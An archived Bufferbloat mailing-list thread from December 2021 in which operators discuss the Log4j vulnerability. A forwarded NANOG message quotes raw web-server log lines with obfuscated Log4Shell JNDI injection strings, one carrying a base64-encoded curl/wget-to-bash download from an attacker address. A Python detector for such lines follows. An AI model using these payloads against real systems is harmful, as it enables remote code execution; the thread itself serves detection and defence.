General list for discussing Bufferbloat
* [Bloat] Fwd: Log4j mitigation
From: Dave Taht @ 2021-12-13 13:56 UTC
  To: bloat

For those of you losing sleep over the Java logging exploit, my heart
goes out to you.

While I'm glad I, personally, and on the bufferbloat-related websites,
haven't got a single thing written in Java, and I lost 3 weeks of my
life over Christmas to Spectre, and several weeks per year - and
usually, right around Christmas! - coping with other CVEs.... this one
seems so big and affecting so many other services I use, that I just
kind of want to take all my cash out of the bank, and log out, and
find a tropical island somewhere.

---------- Forwarded message ---------
From: Jörg Kost <jk@ip-clear.de>
Date: Mon, Dec 13, 2021 at 3:43 AM
Subject: Re: Log4j mitigation
To: Jean St-Laurent <jean@ddostest.me>
Cc: <nanog@nanog.org>


You can't see it. The attack vector can hide in HTTP GETs, POSTs (SSL),
in headers, in anything related to where a Java process does logging
with Log4j; it's innumerable. It might even evaluate from a URI itself;
it won't use a fixed port. It's not wormy right now, but maybe it will
be soon.

We have been seeing things like this since the 10th of Dec. And this is
only a typical Apache log file for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281
"${jndi:dns://45.83.64.1/securityscan-http80}"
"${jndi:dns://45.83.64.1/securityscan-http80}
GET
/?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
HTTP/1.1" 200 -
"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}"
"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}

-- 
I tried to build a better future, a few times:
https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org

Dave Täht CEO, TekLibre, LLC

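The obfuscated lookups in the forwarded log excerpt (case lookups spelling out "ldap", empty lookups whose default value is one letter, URL-encoded braces) can be normalized before matching, which is the only reliable way to catch them in access logs. The following detector is an added example written for this archive page, not code from either poster; its regexes and function names are my own, and the sample log lines are constructed placeholders in the same style as the excerpt.

```python
import re
from urllib.parse import unquote

# Obfuscations visible in the forwarded log excerpt:
#   ${lower:l}${lower:d}...  case lookups spelling out "ldap" one letter at a time
#   ${::-j}${::-n}...        empty lookups whose default value (":-x") is one letter
#   $%7Bjndi:...%7D          URL-encoded braces in the request line
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse nested case/default lookups until stable (all fold to lower case)."""
    text = unquote(text)
    for _ in range(max_rounds):  # bounds the work on deeply nested input
        new = CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text

def find_jndi(line: str):
    """Return the JNDI scheme (ldap, dns, rmi, ...) of a lookup in the line, or None."""
    m = JNDI_LOOKUP.search(normalize(line))
    return m.group(1).lower() if m else None

def flagged(lines):
    """Return (scheme, raw line) for every log line that carries a JNDI lookup."""
    hits = []
    for line in lines:
        scheme = find_jndi(line)
        if scheme:
            hits.append((scheme, line))
    return hits

# Constructed sample lines in the style of the excerpt; hosts are placeholders
# (RFC 5737 addresses and example.net), not indicators from the thread.
SAMPLE_LINES = [
    '${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://203.0.113.10:12344/Basic/x}',
    'GET /$%7Bjndi:dns://203.0.113.20/scan-http80%7D HTTP/1.1" 301 281',
    'GET /?x=${jndi:ldap://${hostName}.probe.example.net/a} HTTP/1.1" 200 -',
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.probe.example.net}"',
    'GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for scheme, line in flagged(SAMPLE_LINES):
        print(f"{scheme:5} {line}")
```

Feeding a real access log through `flagged` line by line gives a quick first pass; a hit only tells you a lookup string reached the log, not whether the logging library on that host was vulnerable.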

* Re: [Bloat] Fwd: Log4j mitigation
From: David Lang @ 2021-12-13 19:42 UTC
  To: Dave Taht; +Cc: bloat

Just a note that this doesn't require the code to be written in Java; any
language that runs in a JVM can end up having grief.

David Lang


